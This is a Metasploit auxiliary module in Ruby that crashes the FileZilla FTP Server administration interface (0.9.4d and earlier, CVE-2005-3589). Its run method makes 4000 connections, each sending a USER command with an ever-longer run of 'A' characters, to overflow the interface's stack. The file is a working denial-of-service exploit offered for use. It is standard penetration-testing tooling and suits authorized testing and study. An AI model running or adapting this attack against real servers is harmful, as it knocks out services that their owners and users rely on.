1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name'	=> 'FileZilla FTP Server Admin Interface Denial of Service',
15
        'Description'	=> %q{
16
          This module triggers a Denial of Service condition in the FileZilla FTP
17
          Server Administration Interface in versions 0.9.4d and earlier.
18
          By sending a procession of excessively long USER commands to the FTP
19
          Server, the Administration Interface (FileZilla Server Interface.exe)
20
          when running, will overwrite the stack with our string and generate an
21
          exception. The FileZilla FTP Server itself will continue functioning.
22
        },
23
        'Author' => [ 'aushack' ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'BID', '15346' ],
27
          [ 'CVE', '2005-3589' ],
28
          [ 'EDB', '1336' ],
29
          [ 'OSVDB', '20817' ]
30
        ],
31
        'DisclosureDate' => '2005-11-07',
32
        'Notes' => {
33
          'Stability' => [CRASH_SERVICE_DOWN],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39
  end
40

41
  def run
42
    print_status('Sending 4000 packets, this may take a while.')
43

44
    4000.times do |x|
45
      connect
46
      sock.put("USER #{'A' * x}\r\n")
47
      disconnect
48
    end
49
  end
50
end
51

52